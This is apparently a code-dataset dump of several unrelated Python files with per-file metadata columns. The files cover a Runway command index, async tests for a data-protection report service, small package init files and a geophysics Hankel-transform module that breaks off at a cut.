| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1ef9dcd1fd42439392f5895754268c6d56005f6d
| 663
|
py
|
Python
|
runway/commands/__init__.py
|
paul-duffy/runway
|
a0c22eb7ca7b55df5317bdda92c08c4bb39569d2
|
[
"Apache-2.0"
] | 1
|
2020-02-25T21:08:00.000Z
|
2020-02-25T21:08:00.000Z
|
runway/commands/__init__.py
|
paul-duffy/runway
|
a0c22eb7ca7b55df5317bdda92c08c4bb39569d2
|
[
"Apache-2.0"
] | 2
|
2020-01-07T15:00:55.000Z
|
2020-01-07T15:03:25.000Z
|
runway/commands/__init__.py
|
voodooGQ/runway
|
8a744f33b39f1342022f1b57db996bb843e4556c
|
[
"Apache-2.0"
] | null | null | null |
"""Collect all the command classes together."""
from .runway import envvars # noqa
from .runway import gen_sample # noqa
from .runway import init # noqa
from .runway import preflight # noqa
from .runway import run_aws # noqa
from .runway import run_python # noqa
from .runway import run_stacker # noqa
from .runway import test # noqa
from .runway import tfenv # noqa
from .runway import kbenv # noqa
from .runway import whichenv # noqa
from .modules import deploy # noqa
from .modules import destroy # noqa
from .modules import dismantle # noqa
from .modules import plan # noqa
from .modules import takeoff # noqa
from .modules import taxi # noqa
| 31.571429
| 47
| 0.751131
| 95
| 663
| 5.2
| 0.315789
| 0.259109
| 0.356275
| 0.404858
| 0.139676
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.187029
| 663
| 20
| 48
| 33.15
| 0.916512
| 0.191554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
482ec6cab84fcf7db4a1a758b05d7b025ee9ee4f
| 151
|
py
|
Python
|
env/lib/python3.6/site-packages/tests/conftest.py
|
anthowen/duplify
|
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
|
[
"MIT"
] | 1
|
2019-04-21T18:57:57.000Z
|
2019-04-21T18:57:57.000Z
|
env/lib/python3.6/site-packages/tests/conftest.py
|
anthowen/duplify
|
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
|
[
"MIT"
] | 1
|
2018-12-11T15:12:56.000Z
|
2018-12-11T15:12:56.000Z
|
env/lib/python3.6/site-packages/tests/conftest.py
|
anthowen/duplify
|
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
|
[
"MIT"
] | null | null | null |
import pytest
@pytest.fixture(scope='function', autouse=True)
def database_access(db):
"""Automatically enable database access for all tests."""
| 21.571429
| 61
| 0.748344
| 19
| 151
| 5.894737
| 0.842105
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125828
| 151
| 6
| 62
| 25.166667
| 0.848485
| 0.337748
| 0
| 0
| 0
| 0
| 0.085106
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6f9b0e95c573e99f0695e827eb6e0f888738a703
| 12,892
|
py
|
Python
|
src/tt_data_protector/tt_data_protector/tests/test_logic.py
|
Alacrate/the-tale
|
43b211f3a99e93964e95abc20a8ed649a205ffcf
|
[
"BSD-3-Clause"
] | 85
|
2017-11-21T12:22:02.000Z
|
2022-03-27T23:07:17.000Z
|
src/tt_data_protector/tt_data_protector/tests/test_logic.py
|
Alacrate/the-tale
|
43b211f3a99e93964e95abc20a8ed649a205ffcf
|
[
"BSD-3-Clause"
] | 545
|
2017-11-04T14:15:04.000Z
|
2022-03-27T14:19:27.000Z
|
src/tt_data_protector/tt_data_protector/tests/test_logic.py
|
Alacrate/the-tale
|
43b211f3a99e93964e95abc20a8ed649a205ffcf
|
[
"BSD-3-Clause"
] | 45
|
2017-11-11T12:36:30.000Z
|
2022-02-25T06:10:44.000Z
|
import uuid
from aiohttp import test_utils
from tt_web import postgresql as db
from .. import logic
from .. import relations
from .. import operations
from .. import exceptions
from . import helpers
class GetPluginForSourceTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test(self):
plugin_1 = await logic.get_pluging_for_source(helpers.get_config()['custom'],
'test_source_1')
plugin_2 = await logic.get_pluging_for_source(helpers.get_config()['custom'],
'test_source_3')
new_plugin_1 = await logic.get_pluging_for_source(helpers.get_config()['custom'],
'test_source_1')
self.assertIs(plugin_1, new_plugin_1)
self.assertIsNot(plugin_1, plugin_2)
@test_utils.unittest_run_loop
async def test_error(self):
with self.assertRaises(exceptions.CanNotConstructPlugin):
await logic.get_pluging_for_source(helpers.get_config()['custom'],
'unknowm_source')
class ProcessSubreportTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test_already_processed(self):
await operations.create_report_base([("test_source_1", 2)])
subreport_ids = await operations.get_unprocessed_subpreports()
subreport = await operations.get_subreport(subreport_ids[0])
subreport = subreport.replace(state=relations.SUBREPORT_STATE.READY)
await operations.update_subreport(subreport)
async with self.check_db_record_not_changed('subreports', subreport.id):
await logic.process_subreport(helpers.get_config()['custom'], subreport.id)
@test_utils.unittest_run_loop
async def test_processing_failed__no_plugin(self):
await operations.create_report_base([("unknowm_source", 2)])
subreport_ids = await operations.get_unprocessed_subpreports()
subreport = await operations.get_subreport(subreport_ids[0])
with self.assertRaises(exceptions.CanNotConstructPlugin):
async with self.check_db_record_not_changed('subreports', subreport.id):
await logic.process_subreport(helpers.get_config()['custom'], subreport.id)
@test_utils.unittest_run_loop
async def test_processing_failed__plugin_work_failed(self):
await operations.create_report_base([("test_source_2", 20)])
subreport_ids = await operations.get_unprocessed_subpreports()
subreport = await operations.get_subreport(subreport_ids[0])
async with self.check_db_record_not_changed('subreports', subreport.id):
await logic.process_subreport(helpers.get_config()['custom'], subreport.id)
await logic.process_subreport(helpers.get_config()['custom'], subreport.id)
new_subreport = await operations.get_subreport(subreport.id)
self.assertEqual(new_subreport.state, relations.SUBREPORT_STATE.READY)
self.assertEqual(new_subreport.data,
{'id': 20,
'report': [['test_source_2', 'type_3', 'data_5'],
['test_source_2', 'type_3', 'data_6']]})
@test_utils.unittest_run_loop
async def test_has_changes(self):
await operations.create_report_base([("test_source_1", 2)])
subreport_ids = await operations.get_unprocessed_subpreports()
subreport = await operations.get_subreport(subreport_ids[0])
await logic.process_subreport(helpers.get_config()['custom'], subreport.id)
new_subreport = await operations.get_subreport(subreport.id)
self.assertEqual(new_subreport.state, relations.SUBREPORT_STATE.READY)
self.assertEqual(new_subreport.data,
{'id': 2,
'report': [['test_source_1', 'type_3', 'data_3']]})
class ProcessSubreportsTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test(self):
report_1_id = await operations.create_report_base([("test_source_1", 2),
("test_source_2", 20),
("test_source_2", 40)])
report_2_id = await operations.create_report_base([("test_source_1", 3),
("test_source_2", 20)])
await logic.process_subreports(helpers.get_config()['custom'])
result = await db.sql('SELECT * FROM subreports WHERE state=%(state)s',
{'state': relations.SUBREPORT_STATE.READY.value})
self.assertEqual(len(result), 1)
self.assertEqual(result[0]['report'], report_1_id)
await logic.process_subreports(helpers.get_config()['custom'])
result = await db.sql('SELECT * FROM subreports WHERE state=%(state)s ORDER BY id',
{'state': relations.SUBREPORT_STATE.READY.value})
self.assertEqual(len(result), 4)
self.assertTrue(all(row['report'] == report_1_id for row in result[:2]))
self.assertTrue(all(row['report'] == report_2_id for row in result[2:]))
await logic.process_subreports(helpers.get_config()['custom'])
result = await db.sql('SELECT * FROM subreports WHERE state=%(state)s ORDER BY ID',
{'state': relations.SUBREPORT_STATE.READY.value})
self.assertEqual(len(result), 5)
class FormReportTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test(self):
report_1_id = await operations.create_report_base([("test_source_1", 1)])
report_2_id = await operations.create_report_base([("test_source_1", 333)])
await logic.process_subreports(helpers.get_config()['custom'])
await logic.form_report(helpers.get_config()['custom'], report_2_id)
report_1 = await operations.get_report(report_1_id)
self.assertEqual(report_1.state, relations.REPORT_STATE.PROCESSING)
self.assertEqual(report_1.data, {'report': []})
report_2 = await operations.get_report(report_2_id)
self.assertEqual(report_2.state, relations.REPORT_STATE.READY)
self.assertEqual(report_2.data, {'report': [['test_source_1', 'xxx', 333]]})
result = await db.sql('SELECT * FROM subreports WHERE state=%(state)s',
{'state': relations.SUBREPORT_STATE.READY.value})
self.assertEqual(len(result), 1)
self.assertEqual(result[0]['report'], report_1_id)
class FormReportsTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test(self):
report_1_id = await operations.create_report_base([("test_source_1", 1)])
report_2_id = await operations.create_report_base([("test_source_1", 333)])
await logic.process_subreports(helpers.get_config()['custom'])
await logic.form_reports(helpers.get_config()['custom'])
report_1 = await operations.get_report(report_1_id)
self.assertEqual(report_1.state, relations.REPORT_STATE.READY)
self.assertEqual(report_1.data, {'report': [['test_source_1', 'type_1', 'data_1'],
['test_source_1', 'type_2', 'data_2']]})
report_2 = await operations.get_report(report_2_id)
self.assertEqual(report_2.state, relations.REPORT_STATE.READY)
self.assertEqual(report_2.data, {'report': [['test_source_1', 'xxx', 333]]})
result = await db.sql('SELECT * FROM subreports WHERE state=%(state)s',
{'state': relations.SUBREPORT_STATE.READY.value})
self.assertEqual(len(result), 0)
class MergeReportTests(helpers.BaseTests):
def test_no_reports(self):
self.assertEqual(logic.merge_report([]), [])
def test_has_reports(self):
self.assertEqual(logic.merge_report([[('a', 'b', 'c'),
('d', 'e', 'f')],
[],
[('a', 'b', 'c'),
('k', 'e', 'f')]]),
[('a', 'b', 'c'),
('d', 'e', 'f'),
('k', 'e', 'f')])
class NormalizeReportTests(helpers.BaseTests):
def test_no_reports(self):
self.assertEqual(logic.normalize_report([]), [])
def test_has_reports(self):
self.assertEqual(logic.normalize_report([('a', 'b', 'c'),
('a', 'b', 'c'),
('k', 'e', 'f'),
('d', 'e', 'f')]),
[('a', 'b', 'c'),
('d', 'e', 'f'),
('k', 'e', 'f')])
class ProcessDeletionRequestTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test_no_request(self):
await logic.process_deletion_request(helpers.get_config()['custom'], 666)
@test_utils.unittest_run_loop
async def test_update_request(self):
await operations.mark_for_deletion(core_id=uuid.uuid4().hex,
ids=[('test_source_2', 20),
('test_source_2', 40)])
unprocessed_ids = await operations.get_unprocessed_deletion_requests()
old_request_1 = await operations.get_deletion_request(unprocessed_ids[0])
old_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
await logic.process_deletion_request(helpers.get_config()['custom'], old_request_1.id)
new_request_1 = await operations.get_deletion_request(unprocessed_ids[0])
new_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
self.assertEqual(old_request_2, new_request_2)
self.assertEqual(new_request_1.data['counter'], 1)
@test_utils.unittest_run_loop
async def test_remove_request(self):
await operations.mark_for_deletion(core_id=uuid.uuid4().hex,
ids=[('test_source_2', 20),
('test_source_2', 40)])
unprocessed_ids = await operations.get_unprocessed_deletion_requests()
unprocessed_ids.sort()
old_request_1 = await operations.get_deletion_request(unprocessed_ids[0])
old_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
await logic.process_deletion_request(helpers.get_config()['custom'], old_request_1.id)
await logic.process_deletion_request(helpers.get_config()['custom'], old_request_1.id)
new_request_1 = await operations.get_deletion_request(unprocessed_ids[0])
new_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
self.assertEqual(old_request_2, new_request_2)
self.assertEqual(new_request_1, None)
class ProcessDeletionRequestsTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test_no_requests(self):
await logic.process_deletion_requests(helpers.get_config()['custom'])
@test_utils.unittest_run_loop
async def test(self):
await operations.mark_for_deletion(core_id=uuid.uuid4().hex,
ids=[('test_source_2', 20),
('test_source_2', 40)])
await operations.mark_for_deletion(core_id=uuid.uuid4().hex,
ids=[('test_source_1', 1)])
unprocessed_ids = await operations.get_unprocessed_deletion_requests()
unprocessed_ids.sort()
await logic.process_deletion_requests(helpers.get_config()['custom'])
new_request_1 = await operations.get_deletion_request(unprocessed_ids[0])
new_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
new_request_3 = await operations.get_deletion_request(unprocessed_ids[2])
self.assertEqual(new_request_1.data['counter'], 1)
self.assertEqual(new_request_2.data['counter'], 1)
self.assertEqual(new_request_3, None)
await logic.process_deletion_requests(helpers.get_config()['custom'])
new_request_1 = await operations.get_deletion_request(unprocessed_ids[0])
new_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
self.assertEqual(new_request_1, None)
self.assertEqual(new_request_2.data['counter'], 2)
await logic.process_deletion_requests(helpers.get_config()['custom'])
new_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
self.assertEqual(new_request_2, None)
| 41.993485
| 94
| 0.627056
| 1,472
| 12,892
| 5.173913
| 0.085598
| 0.090599
| 0.073267
| 0.069328
| 0.90218
| 0.872111
| 0.840205
| 0.815651
| 0.784007
| 0.745798
| 0
| 0.019176
| 0.259774
| 12,892
| 306
| 95
| 42.130719
| 0.778896
| 0
| 0
| 0.618357
| 0
| 0
| 0.082073
| 0
| 0
| 0
| 0
| 0
| 0.188406
| 1
| 0.019324
| false
| 0
| 0.038647
| 0
| 0.101449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6fc369c3044b335fa8a550d3e0abd0c9f9daccd6
| 46
|
py
|
Python
|
cride/registros/serializers/__init__.py
|
albertoaldanar/serecsinAPI
|
ca0f72d42b2e23d4a28cafccef9892055f922bfc
|
[
"MIT"
] | null | null | null |
cride/registros/serializers/__init__.py
|
albertoaldanar/serecsinAPI
|
ca0f72d42b2e23d4a28cafccef9892055f922bfc
|
[
"MIT"
] | 8
|
2020-06-05T21:51:05.000Z
|
2022-01-13T01:25:00.000Z
|
cride/registros/serializers/__init__.py
|
albertoaldanar/serecsinAPI
|
ca0f72d42b2e23d4a28cafccef9892055f922bfc
|
[
"MIT"
] | null | null | null |
from .egresos import *
from .ingresos import *
| 23
| 23
| 0.76087
| 6
| 46
| 5.833333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152174
| 46
| 2
| 23
| 23
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6ff02bd2f42ed39d7d8f4244b21070128a64aac6
| 122
|
py
|
Python
|
mmdet/ops/nms/__init__.py
|
Lanselott/mmdetection
|
03ce0a87f4d52f4adf4f78fd39ad30b2da394376
|
[
"Apache-2.0"
] | null | null | null |
mmdet/ops/nms/__init__.py
|
Lanselott/mmdetection
|
03ce0a87f4d52f4adf4f78fd39ad30b2da394376
|
[
"Apache-2.0"
] | null | null | null |
mmdet/ops/nms/__init__.py
|
Lanselott/mmdetection
|
03ce0a87f4d52f4adf4f78fd39ad30b2da394376
|
[
"Apache-2.0"
] | null | null | null |
from .nms_wrapper import nms, soft_nms#, nms_v2
# __all__ = ['nms', 'soft_nms', 'nms_v2']
__all__ = ['nms', 'soft_nms']
| 20.333333
| 47
| 0.655738
| 19
| 122
| 3.473684
| 0.368421
| 0.318182
| 0.454545
| 0.393939
| 0.69697
| 0.69697
| 0.69697
| 0.69697
| 0.69697
| 0
| 0
| 0.019231
| 0.147541
| 122
| 5
| 48
| 24.4
| 0.615385
| 0.393443
| 0
| 0
| 0
| 0
| 0.15493
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b50541daeae13c620908e8f969d87720a6622e34
| 45
|
py
|
Python
|
alphabets.py
|
Jing-lun/GPR_dilectric_prediction
|
c841f6b17ce56cfd8963799ec00d4d54b1dba7c9
|
[
"MIT"
] | null | null | null |
alphabets.py
|
Jing-lun/GPR_dilectric_prediction
|
c841f6b17ce56cfd8963799ec00d4d54b1dba7c9
|
[
"MIT"
] | null | null | null |
alphabets.py
|
Jing-lun/GPR_dilectric_prediction
|
c841f6b17ce56cfd8963799ec00d4d54b1dba7c9
|
[
"MIT"
] | null | null | null |
alphabet = """1
2
3
4
5
6
7
8
9
10
11
12
"""
| 3.214286
| 15
| 0.511111
| 13
| 45
| 1.769231
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0.333333
| 45
| 13
| 16
| 3.461538
| 0.266667
| 0
| 0
| 0
| 0
| 0
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d21ea2724b9e7bdaeeba4a6b5803297a237a0ad3
| 352
|
py
|
Python
|
tests/test_metaclass/test_metaclass.py
|
bakkerthehacker/both
|
37bfdc41c97476cb74dced06570f5988356e4984
|
[
"MIT"
] | 6
|
2019-06-04T04:00:45.000Z
|
2021-01-23T22:36:37.000Z
|
tests/test_metaclass/test_metaclass.py
|
bakkerthehacker/both
|
37bfdc41c97476cb74dced06570f5988356e4984
|
[
"MIT"
] | null | null | null |
tests/test_metaclass/test_metaclass.py
|
bakkerthehacker/both
|
37bfdc41c97476cb74dced06570f5988356e4984
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
def test_metaclass_py2():
import tests.test_metaclass.metaclass_py2 as metaclass_py2
assert type(metaclass_py2.TestMetaAndBase) is metaclass_py2.TestMeta
def test_metaclass_py3():
import tests.test_metaclass.metaclass_py3 as metaclass_py3
assert type(metaclass_py3.TestMetaAndBase) is metaclass_py3.TestMeta
| 29.333333
| 72
| 0.795455
| 47
| 352
| 5.659574
| 0.340426
| 0.225564
| 0.120301
| 0.180451
| 0.24812
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035831
| 0.127841
| 352
| 11
| 73
| 32
| 0.830619
| 0.059659
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d22e98b97c4db93c8c0b0a7342b39bce54fd8b93
| 161
|
py
|
Python
|
server/snippet.py
|
NikPrav/InterIIT_Bosch
|
cdc3554eb4a3492b04e6667c9d446553c3676819
|
[
"CNRI-Python",
"Linux-OpenIB"
] | null | null | null |
server/snippet.py
|
NikPrav/InterIIT_Bosch
|
cdc3554eb4a3492b04e6667c9d446553c3676819
|
[
"CNRI-Python",
"Linux-OpenIB"
] | null | null | null |
server/snippet.py
|
NikPrav/InterIIT_Bosch
|
cdc3554eb4a3492b04e6667c9d446553c3676819
|
[
"CNRI-Python",
"Linux-OpenIB"
] | null | null | null |
from dbmodels import Workspace
def add_training_progress(workspace_id, dict_):
Workspace.objects(workspace_id=workspace_id).update_one(state=dict_).save()
| 26.833333
| 79
| 0.819876
| 22
| 161
| 5.636364
| 0.681818
| 0.266129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 161
| 5
| 80
| 32.2
| 0.843537
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9660246c13fa2c2ce6baa1781fdd3e528b10be8f
| 77
|
py
|
Python
|
helloworld.py
|
AngelinaYadav/python-programming
|
9ae4d698dc67da854b6f2351989775b18f6634f1
|
[
"Apache-2.0"
] | null | null | null |
helloworld.py
|
AngelinaYadav/python-programming
|
9ae4d698dc67da854b6f2351989775b18f6634f1
|
[
"Apache-2.0"
] | null | null | null |
helloworld.py
|
AngelinaYadav/python-programming
|
9ae4d698dc67da854b6f2351989775b18f6634f1
|
[
"Apache-2.0"
] | null | null | null |
"""
write your first program in python
"""
print("helloworld in python !!")
| 12.833333
| 34
| 0.675325
| 10
| 77
| 5.2
| 0.8
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.168831
| 77
| 5
| 35
| 15.4
| 0.8125
| 0.441558
| 0
| 0
| 0
| 0
| 0.657143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
967588c1485339ee277008cacbcd20b8bb133e02
| 79
|
py
|
Python
|
src/hierarchy/simulation/base/__init__.py
|
drvinceknight/HierarchicalPromotion
|
8fce38c4dc9b21f50a8ef769482fd6a82cf0e6a3
|
[
"MIT"
] | null | null | null |
src/hierarchy/simulation/base/__init__.py
|
drvinceknight/HierarchicalPromotion
|
8fce38c4dc9b21f50a8ef769482fd6a82cf0e6a3
|
[
"MIT"
] | 7
|
2019-10-01T06:47:05.000Z
|
2020-11-18T13:10:20.000Z
|
src/hierarchy/simulation/base/__init__.py
|
drvinceknight/HierarchicalPromotion
|
8fce38c4dc9b21f50a8ef769482fd6a82cf0e6a3
|
[
"MIT"
] | null | null | null |
from .simulation import get_simulated_history, get_simulated_stationary_vector
| 39.5
| 78
| 0.911392
| 10
| 79
| 6.7
| 0.8
| 0.358209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063291
| 79
| 1
| 79
| 79
| 0.905405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
96b88b0ef660b44a6a745a1b675a353f12c93de9
| 48,134
|
py
|
Python
|
emulatte/core/transform.py
|
WasedaGeophysics/w1dem
|
487e117ad0f7b74367f22ad404bd4f6adf473a7b
|
[
"Apache-2.0"
] | 1
|
2021-12-13T00:15:20.000Z
|
2021-12-13T00:15:20.000Z
|
emulatte/core/transform.py
|
WasedaGeophysics/w1dem
|
487e117ad0f7b74367f22ad404bd4f6adf473a7b
|
[
"Apache-2.0"
] | null | null | null |
emulatte/core/transform.py
|
WasedaGeophysics/w1dem
|
487e117ad0f7b74367f22ad404bd4f6adf473a7b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Waseda Geophysics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
"""
hankel変換やFD<->TD変換に用いるクラスメソッド
Class List
* HankelTransform
* FourierTransform
"""
import numpy as np
from emulatte.core import kernels, filters
class HankelTransform:
"""Hankel Transform
Hankel変換による応答の計算
Index:
vmd
hmdx
hmdy
ved
hedx
hedy
circular_loop
coincident_loop
grounded_wire
loop_source
x_line_source
y_line_source
"""
@staticmethod
def vmd(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base/model.r
kernel = kernels.compute_kernel_vmd(model, omega)
ans = {}
e_phi = np.dot(wt1, kernel[0]) / model.r
h_r = np.dot(wt1, kernel[1]) / model.r
h_z = np.dot(wt0, kernel[2]) / model.r
ans["e_x"] = -1 / (4 * np.pi) * model.ztilde[model.slayer - 1] \
* -model.sin_phi * e_phi
ans["e_y"] = -1 / (4 * np.pi) * model.ztilde[model.slayer - 1] \
* model.cos_phi * e_phi
ans["e_z"] = 0
ans["h_x"] = 1 / (4 * np.pi) * model.cos_phi * h_r
ans["h_y"] = 1 / (4 * np.pi) * model.sin_phi * h_r
ans["h_z"] = 1 / (4 * np.pi) * model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] * h_z
return ans
@staticmethod
def hmdx(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hmd(model, omega)
ans = {}
tm_er_1 = np.dot(wt0, kernel[0] * model.lambda_) / model.r
tm_er_2 = np.dot(wt1, kernel[0]) / model.r
te_er_1 = np.dot(wt0, kernel[1] * model.lambda_) / model.r
te_er_2 = np.dot(wt1, kernel[1]) / model.r
tm_ez = np.dot(wt1, kernel[2] * model.lambda_**2) / model.r
tm_hr_1 = np.dot(wt0, kernel[3] * model.lambda_) / model.r
tm_hr_2 = np.dot(wt1, kernel[3]) / model.r
te_hr_1 = np.dot(wt0, kernel[4] * model.lambda_) / model.r
te_hr_2 = np.dot(wt1, kernel[4]) / model.r
te_hz = np.dot(wt1, kernel[5] * model.lambda_**2) / model.r
amp_tm_ex_1 = -(model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ex_2 = (model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 3)
amp_te_ex_1 = - model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_te_ex_2 = model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3)
amp_tm_ey_1 = -(model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ey_2 = (model.ztilde * model.ytilde)[model.slayer - 1] \
/ (4 * np.pi * model.ytilde[model.rlayer - 1]) \
* (2 * (model.ry - model.sy) ** 2 / model.r ** 3 - 1 \
/ model.r)
amp_te_ey_1 = model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_te_ey_2 = -model.ztilde[model.slayer - 1] \
/ (4 * np.pi) * (2 * (model.rx - model.sx) ** 2 \
/ model.r ** 3 - 1 / model.r)
amp_tm_ez = - model.ztilde[model.slayer - 1] \
* (model.ry - model.sy) / (4 * np.pi * model.r)
amp_tm_hx_1 = model.k[model.slayer - 1] ** 2 \
* (model.ry - model.sy) ** 2 / model.r ** 2 \
/ (4 * np.pi)
amp_tm_hx_2 = - model.k[model.slayer - 1] ** 2 \
* (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_hx_1 = (model.rx - model.sx) ** 2 / (4 * np.pi * model.r ** 2)\
* model.ztilde[model.slayer - 1] \
